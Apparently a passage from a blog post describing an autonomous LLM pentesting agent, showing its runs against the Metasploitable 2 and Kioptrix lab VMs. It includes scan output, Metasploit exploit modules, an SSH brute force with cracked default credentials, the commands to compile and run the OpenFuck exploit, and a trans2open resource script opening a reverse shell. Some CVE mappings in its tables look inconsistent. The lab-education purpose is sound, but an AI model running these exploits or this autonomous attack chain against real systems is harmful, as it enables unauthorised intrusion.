139/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X
445/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X
513/tcp  open   login
2049/tcp open   nfs
2121/tcp open   ftp          ProFTPD 1.3.1
3306/tcp open   mysql        MySQL 5.0.51a
5432/tcp open   postgresql   PostgreSQL 8.3.0
5900/tcp open   vnc          VNC protocol 3.3
6000/tcp open   x11
8009/tcp open   ajp13

Step 2 — FINGERPRINT: HTTP and SMB Deep Dive

http://192.168.72.150:80
  Server:     Apache/2.2.8 (Ubuntu) DAV/2
  Powered-By: PHP/5.2.4-2ubuntu5.10
  CMS:        phpmyadmin

✔ SMB version detected: Samba 3.0.20

This is critical — Samba 3.0.20 falls exactly in the vulnerable range for CVE-2007-2447 (the usermap_script RCE).

Step 3 — MSF_SEARCH: 206 Metasploit Modules Discovered

The agent queries msfconsole search for every detected service and version string. Some highlights:

vsftpd  → exploit/unix/ftp/vsftpd_234_backdoor        [excellent]
samba   → exploit/multi/samba/usermap_script           [excellent]
php     → exploit/multi/http/php_cgi_arg_injection     [excellent]
mysql   → exploit/multi/mysql/mysql_udf_payload        [great]

206 unique modules discovered in total — the agent doesn’t try all of them. The RAG and validation layers cut that down to what actually applies.

Step 4 — RESEARCH: RAG Matches 16 Validated Exploits

The ChromaDB semantic search matches services to the pre-embedded vulnerability knowledge base. Key matches:

Step 5 — CVE_INTEL: 26 CVEs Fetched from NVD + ExploitDB

RAG ID	Module	Port	Notes
CVE-2011-2523	`exploit/unix/ftp/vsftpd_234_backdoor`	21	vsftpd 2.3.4 backdoor
CVE-2007-2447	`exploit/multi/samba/usermap_script`	139	Samba username map script RCE
CVE-2010-4221	`exploit/unix/ftp/proftpd_133c_backdoor`	2121	ProFTPD backdoor
MYSQL-UDF	`exploit/multi/mysql/mysql_udf_payload`	3306	MySQL UDF RCE
POSTGRES-DEFAULT	`exploit/linux/postgres/postgres_payload`	5432	PostgreSQL execution
SSH-BRUTE	`auxiliary/scanner/ssh/ssh_login`	22	Credential brute-force
VNC-DEFAULT	`auxiliary/scanner/vnc/vnc_login`	5900	VNC default password check
CVE-2017-0144	`exploit/windows/smb/ms17_010_eternalblue`	445	EternalBlue (queued, wrong OS)

The agent queries the NVD API and ExploitDB for each detected service — read-only, no execution. Results appear in the CVE Intelligence panel in the UI for analyst review:

CVE-2011-2523  ftp:21      ← vsftpd backdoor
CVE-2014-6271  http:80     ← Shellshock
CVE-2017-0144  smb:445     ← EternalBlue
CVE-2010-4221  ftp:21      ← ProFTPD
CVE-2007-2447  samba:139   ← Samba usermap_script
CVE-2012-4879  telnet:23
CVE-2017-9482  telnet:23
... (26 total)

This data is injected into the LLM’s analysis context if the analyst pastes relevant findings into the Analyst Notes field.

Step 6 — ANALYZE: LLM Ranks the Attack Surface

1. Telnet (Port 23)
   - CVSS: High (9.8)
   - ExploitDB ID: EDB-2
   - Description: Multiple critical vulnerabilities in Linux telnetd.
   - RAG Matched Exploit: [CRED-REUSE-TELNET] auxiliary/scanner/telnet/telnet_login
   - Metasploit Search Result: exploit/linux/local/telnetdxtermbash_exec (CVE-2016-5791)

2. FTP (Port 21)
   - CVSS: High (9.4)
   - ExploitDB ID: EDB-3
   - Description: Use-after-free vulnerability in the Response API.
   - RAG Matched Exploits:
     - [CVE-2011-2523] exploit/unix/ftp/vsftpd234backdoor
     - [FTP-ANON-DATA] auxiliary/scanner/ftp/ftp_version
     - [CVE-2017-7418] exploit/multi/http/proftpdmodcopy_exec
   - Metasploit Search Result: exploit/unix/ftp/vsftpd234backdoor

3. MySQL (Port 3306)
   - CVSS: High (5.0)
   - ExploitDB ID: EDB-1
   - Description: Multiple vulnerabilities in MySQL.
   - RAG Matched Exploit: [MYSQL-UDF] exploit/multi/mysql/mysqludfpayload
   - Metasploit Search Result: exploit/unix/mysql/mysqludfpayload

Step 7 — PLANNER: 19 Commands Assembled

The planner combines RAG templates (highest trust) with LLM suggestions (creative, needs validation):

Priority breakdown:
  0  analyst-priority commands   (none pasted this run)
  3  LLM-suggested commands
  16 RAG template commands
  ─────────────────────────────
  19 total

The LLM suggested exploit/unix/ftp/vsftpd_234_backdoor — but it was already in the RAG plan, so the duplicate was dropped.

Step 8 — VALIDATE: 17 Commands Cleared, 2 Blocked

✔ exploit/unix/ftp/vsftpd_234_backdoor           — cleared
✔ auxiliary/scanner/ftp/anonymous                 — cleared
✔ auxiliary/scanner/ssh/ssh_login                 — cleared
✔ exploit/multi/samba/usermap_script              — cleared
✘ auxiliary/scanner/telnet/telnet_login           — BLOCKED (unresolved {username}/{password} placeholders)
✘ auxiliary/scanner/smb/smb_enumshares            — BLOCKED (version mismatch: requires Samba 4.x, target is 3.0.20)
~ exploit/linux/http/cisco_prime_inf_rce          — passed through (unknown module, placeholder fix applied)

Step 9 — EXECUTE: Shell Obtained in 5 Commands

The agent runs commands sequentially, stopping the moment it gets a shell. It only needed 5 out of 17:

[1] exploit/unix/ftp/vsftpd_234_backdoor    ✘ FAIL   — payload mismatch, default payload override conflict
[2] auxiliary/scanner/ftp/anonymous          ✔ SUCCESS — FTP anonymous READ access confirmed (vsftpd 2.3.4)
[3] FTP directory traversal via curl         ⚠ ERROR  — empty directory listing
[4] Shellshock probe on /cgi-bin/status      ? UNKNOWN — 404, CGI not present
[5] auxiliary/scanner/ssh/ssh_login          ✔ SUCCESS — msfadmin:msfadmin cracked!
    🎯 SHELL OBTAINED — skipping remaining 12 commands

The SSH brute-force hit on msfadmin:msfadmin — a classic Metasploitable default credential. Session opened:

[+] 192.168.72.150:22 - Success: 'msfadmin:msfadmin'
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),...
    Linux metasploitable 2.6.24-16-server #1 SMP Mon Apr 10 13:58:00 UTC 2008

Step 10 — CRED_REUSE: Credentials Validated Across All Protocols

With msfadmin:msfadmin in hand, the agent tests the credentials against SSH and Telnet on all discovered auth services:

[CRED-REUSE] msfadmin:msfadmin
  ✔ SSH    → LOGIN OK  (session opened, id/whoami confirmed)
  ✔ Telnet → LOGIN OK  (shell session opened)

[CRED-REUSE] msfadmin;:msfadmin   (second variant from ssh_login output)
  ✔ SSH    → LOGIN OK
  ✔ Telnet → LOGIN OK

6 attempts total — 6 successful.

┌────────────────────────────────────────┐
│  CREDENTIAL ACCESS          1 VERIFIED │
│                                        │
│  msfadmin : msfadmin  [LOGIN OK]       │
│  via SSH login                         │
└────────────────────────────────────────┘

Final Result

╔══════════════════════════════════════╗
║   TARGET COMPROMISED                 ║
║   7 VECTORS SUCCESSFUL               ║
║                                      ║
║   Target:  192.168.72.150            ║
║   Outcome: Shell + 2 verified creds  ║
║   Time:    ~4 minutes                ║
╚══════════════════════════════════════╝

The entire pipeline — scan, research, plan, validate, exploit, credential reuse — ran autonomously. The human’s only job was to click Initiate Agent and watch.

Key Takeaways From This Run

Live Example 2 — Auto-Exploiting Kioptrix Level 1

Observation	Why It Matters
vsftpd backdoor failed due to payload conflict	Shows why VALIDATE alone isn’t enough — some failures only surface at runtime
SSH brute-force succeeded before Samba RCE ran	The agent stops at first success — no wasted exploitation
Samba `smb_enumshares` was blocked by validator	Version-aware RAG filtering saved time and prevented false-positive noise
Credentials reused across SSH + Telnet	One cracked password → full access to multiple services
26 CVEs fetched for analyst review	Human-in-the-loop CVE research panel provides context even when not injected

This is a second real run, this time against Kioptrix Level 1 (192.168.36.128) — a classic beginner CTF VM. Unlike Metasploitable 2, Kioptrix has only 5 open ports and no default credentials to fall back on. The agent has to exploit the software itself.

Target Profile

Host:    192.168.36.128   (Kioptrix Level 1)
Kali:    172.28.255.59
OS:      Red Hat Linux (circa 2001)

What Phantom Red Did (Step by Step)

Step 1 — RECON: 5 Open Ports, Vintage Software Stack

PORT    STATE  SERVICE      VERSION
22/tcp  open   ssh          OpenSSH 2.9p2 (protocol 1.99)
80/tcp  open   http         Apache/1.3.20 (Unix) (Red-Hat/Linux)
                             mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open   rpcbind      2 (RPC #100000)
139/tcp open   netbios-ssn  Samba smbd (workgroup: MYGROUP)
443/tcp open   ssl/https    Apache/1.3.20 (Unix) (Red-Hat/Linux)
                             mod_ssl/2.8.4 OpenSSL/0.9.6b

Only 5 ports — a much tighter attack surface than Metasploitable 2. But the software versions are ancient: Apache 1.3.20, OpenSSL 0.9.6b, OpenSSH 2.9p2. These are 2001-era builds with well-known critical CVEs.

Step 2 — FINGERPRINT: Two HTTP Endpoints + Samba 2.2.1a

http://192.168.36.128:80
  Server:   Apache/1.3.20 (Unix) (Red-Hat/Linux)
            mod_ssl/2.8.4 OpenSSL/0.9.6b
  Frameworks: Apache

https://192.168.36.128:443
  (no additional headers exposed)

SMB: Samba 2.2.1a  ← critical finding

Samba 2.2.1a is in the vulnerable range for exploit/linux/samba/trans2open (CVE-2003-0201) — a classic heap overflow giving root.

Step 3 — MSF_SEARCH: 52 Modules Found

With only 5 services to search against, the module count is much lower than Metasploitable 2 — 52 vs 206. Quality over quantity: the agent narrows in on what actually matters.

ssh    → auxiliary/scanner/ssh/ssh_login                [excellent]
samba  → exploit/multi/samba/usermap_script             [excellent]
http   → exploit/multi/http/apache_normalize_path_rce   [excellent]

Step 4 — RESEARCH: 7 RAG Exploits Matched

The ChromaDB semantic search returns 7 validated matches. Two are immediately notable:

RAG ID	Module	Port	Notes
CVE-2002-0082	`exploit/unix/remote/openfuck`	443	mod_ssl OpenFuck buffer overflow
CVE-2014-0160	`auxiliary/scanner/ssl/openssl_heartbleed`	443	Heartbleed
CVE-2002-0082	`exploit/linux/samba/trans2open`	443	Samba 2.2.x heap overflow
CVE-2014-6271	`exploit/multi/http/apache_mod_cgi_bash_env_exec`	80	Shellshock
SSH-BRUTE	`auxiliary/scanner/ssh/ssh_login`	22	Credential brute-force
HTTP-ENUM	`auxiliary/scanner/http/dir_scanner`	80	Directory scan
HTTP-INFO	`auxiliary/scanner/http/http_version`	80	Server banner grab

Key version filtering in action: exploit/multi/samba/usermap_script (which worked on Metasploitable 2) was blocked 7 times — it requires Samba 3.0.x, and this target runs 2.2.1a. The RAG system correctly routes to trans2open instead, which targets the 2.2.x range.

Step 5 — CVE_INTEL: 1 CVE + 25 ExploitDB Entries

Because Kioptrix’s software is so old, NVD’s post-2010 API returns limited data (only 1 CVE). But ExploitDB has 25 public exploit entries for the detected services — plenty of historical PoC material for analyst review.

Step 6 — ANALYZE: LLM Identifies the Right Attack Vectors

Summary of Attack Surface — Target: 192.168.36.128

Open Services:
  - SSH (port 22): OpenSSH 2.9p2 — vulnerable to brute force attacks
  - HTTP/HTTPS (80/443): Apache 1.3.20 with potential web vulnerabilities
  - RPCBIND (port 111): rpcbind 2, susceptible to CVE-2015-7236
  - Samba (port 139): Samba 2.2.1a, vulnerable to various exploits

Top 3 Entry Points:
  1. SSH Brute Force — high priority (open SSH service)
  2. Heartbleed (CVE-2015-7236) — high impact on HTTPS
  3. Trans2open (Samba 2.2.1a) — leads to remote code execution

Step 7 — PLANNER: 9 Commands, 2 LLM Duplicates Dropped

Priority breakdown:
  0  analyst-priority commands
  2  LLM-suggested commands       (both duplicates of RAG — dropped)
  7  RAG template commands
  ─────────────────────────────
  9  total

The LLM independently suggested exploit/linux/samba/trans2open and exploit/unix/remote/openfuck — exactly what RAG already had. Duplicates dropped, RAG versions kept (they carry pre-verified metadata).

Step 8 — VALIDATE: All 9 Commands Cleared

✔ auxiliary/scanner/ssh/ssh_login
✔ auxiliary/scanner/ssl/openssl_heartbleed
✔ auxiliary/scanner/http/dir_scanner
✔ exploit/unix/remote/openfuck        (via compiled C binary)
✔ exploit/linux/samba/trans2open      (via RC file)
... (9 total)

No blocks this run — every command had resolved placeholders and passed version checks.

Step 9 — EXECUTE: Two Exploits Hit, Shell on Command 4

[1] auxiliary/scanner/ssh/ssh_login          ✘ FAIL   — msfadmin:msfadmin doesn't exist on Kioptrix
[2] exploit/unix/remote/openfuck             ✔ SUCCESS — compiled OpenFuck, got shell via mod_ssl overflow
[3] auxiliary/scanner/ssl/openssl_heartbleed ✘ FAIL   — no heartbeat response (not vulnerable)
[4] msfconsole -r /tmp/kioptrix_pwn.rc       ✔ SUCCESS — Samba trans2open → shell
    🎯 SHELL OBTAINED — skipping remaining 5 commands

Command 2 — OpenFuck (CVE-2002-0082) is the most interesting. The agent built and ran a full C exploit pipeline autonomously:

# The agent did all of this in a single command:

# 1. Fetched the exploit source (ExploitDB #47080)
cp /usr/share/exploitdb/exploits/unix/remote/47080.c /tmp/47080.c

# 2. Compiled it (with OpenSSL fallbacks for modern Kali)
gcc -o /tmp/OpenFuck /tmp/47080.c -lssl -lcrypto -Wno-deprecated-declarations

# 3. Ran it with the correct offset for RedHat 7.2 apache-1.3.20-16
/tmp/OpenFuck 0x6b 192.168.36.128 443 -c 40
# offset 0x6b = "RedHat 7.2 apache-1.3.20-16 variant 2"

# Output:
# === Trying offset 0x6b (RedHat 7.2 apache-1.3.20-16 variant 2) ===
# * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
# [shell obtained]

Command 4 — Samba trans2open used a pre-written Metasploit resource script (/tmp/kioptrix_pwn.rc):

resource (/tmp/kioptrix_pwn.rc)> use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (/tmp/kioptrix_pwn.rc)> set RHOSTS 192.168.36.128
RHOSTS => 192.168.36.128
[*] Started reverse TCP handler
[*] Trying return address 0xbffffXXX...
[+] 192.168.36.128:139 - Shell obtained!

From root  Sat Sep 26 11:42:10 2009
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Step 10 — CRED_REUSE: Skipped

No credentials were extracted during exploitation (both winning exploits gave direct shell access without dumping auth data), so the credential reuse phase was skipped entirely.

[NODE:CRED-REUSE] No credentials found — skipping.

Final Result

╔══════════════════════════════════════╗
║   TARGET COMPROMISED                 ║
║   1 VECTOR SUCCESSFUL                ║
║                                      ║
║   Target:  192.168.36.128            ║
║   Outcome: Root shell (no creds)     ║
║   Time:    ~4 minutes                ║
╚══════════════════════════════════════╝

Key Takeaways From This Run

Comparing the Two Runs

Both targets fell in under 4 minutes. Different software, different attack paths, same autonomous outcome.

Observation	Why It Matters
SSH brute-force failed — no fallback credentials	Kioptrix has no default creds; the agent adapted without stalling
RAG blocked `usermap_script` 7 times (wrong Samba version)	Version-aware filtering prevents wasted time on incompatible exploits
Agent compiled a 2002 C exploit from source autonomously	The planner encodes the full fetch → compile → run chain in one command
OpenFuck succeeded AND trans2open succeeded	Two independent attack paths both worked — agent stopped after the first shell
Heartbleed returned no data	Target’s OpenSSL/0.9.6b predates Heartbleed (2014) — scanner correctly returned no leak
CRED_REUSE skipped cleanly	Agent only runs phases where there’s something to work with

	Metasploitable 2	Kioptrix Level 1
Open ports	18	5
MSF modules found	206	52
RAG matches	16	7
Commands queued	17	9
Winning exploit	SSH brute-force (default creds)	mod_ssl OpenFuck (CVE-2002-0082)
Credential reuse	6/6 successful	Skipped (no creds)
Attack class	Credential-based	Binary exploitation (buffer overflow)

Built and written by Rusheel. All testing performed on authorized, intentionally vulnerable VMs.This project is intended for educational purposes, CTF practice, and authorized penetration testing only.

How I Built Phantom Red — An AI Agent That Hunts Vulnerabilities and Auto Exploits

Table of Contents

What is Phantom Red?

The Big Picture

Part 1 — The Brain

How the LLM Works

The Transformer Architecture (Quick Refresher)

Why Qwen 2.5 Coder?

How Ollama Works

Part 2 — The Memory

How RAG Works

The RAG Pipeline

What is an Embedding?

The Vulnerability Database

Part 3 — The Nervous System

How the Agent Works (LangGraph)

Agents vs Chains

What is LangGraph?

The Shared State

Building the Graph

Part 4 — The Hands

How Tools Work

Tool 1: WSL Command Execution (engine/tools.py)

Tool 2: Nmap Scanner

Tool 3: CVE Research (engine/cve_research.py)

Part 5 — The Full Pipeline

Step by Step: What Happens When You Run Phantom Red

Step 1: RECON Node

Step 2: HTTP_FINGERPRINT Node

Step 3: MSF_SEARCH Node

Step 4: RESEARCH Node (RAG Magic)

Step 5: CVE_INTEL Node

Step 6: ANALYZE Node (LLM Reasoning)

Step 7: PLANNER Node

Step 8: VALIDATE Node

Step 9: EXECUTE Node

Step 10: CRED_REUSE Node

Part 6 — The Code Explained

How Libraries Are Used Together

The Streaming Architecture

Part 7 — How it Finds Vulnerabilities

The Semantic Search Advantage

Part 8 — How it Executes Exploits

The Execution Engine

The Command Flow for a Metasploit Exploit

Resource Script Pattern (Advanced Exploits)

Part 9 — The UI

Watching it Work in Real Time

Key Libraries Explained

How it All Comes Together — The Mental Model

Lessons Learned

1. LLMs hallucinate — RAG doesn’t

2. State machines beat ReAct loops for deterministic tasks

3. Analyst-in-the-loop is the killer feature

4. Prompt engineering is everything

5. Timeouts are non-negotiable

Tech Stack Summary

What’s Next

Live Example — Auto-Exploiting Metasploitable 2

Setup

What Phantom Red Did (Step by Step)

Step 1 — RECON: nmap Discovers 18 Open Services

Step 2 — FINGERPRINT: HTTP and SMB Deep Dive

Step 3 — MSF_SEARCH: 206 Metasploit Modules Discovered

Step 4 — RESEARCH: RAG Matches 16 Validated Exploits

Step 5 — CVE_INTEL: 26 CVEs Fetched from NVD + ExploitDB

Step 6 — ANALYZE: LLM Ranks the Attack Surface

Step 7 — PLANNER: 19 Commands Assembled

Step 8 — VALIDATE: 17 Commands Cleared, 2 Blocked

Step 9 — EXECUTE: Shell Obtained in 5 Commands

Step 10 — CRED_REUSE: Credentials Validated Across All Protocols

Final Result

Key Takeaways From This Run

Live Example 2 — Auto-Exploiting Kioptrix Level 1

Target Profile

What Phantom Red Did (Step by Step)

Step 1 — RECON: 5 Open Ports, Vintage Software Stack

Step 2 — FINGERPRINT: Two HTTP Endpoints + Samba 2.2.1a

Step 3 — MSF_SEARCH: 52 Modules Found

Step 4 — RESEARCH: 7 RAG Exploits Matched

Tool 1: WSL Command Execution (`engine/tools.py`)

Tool 3: CVE Research (`engine/cve_research.py`)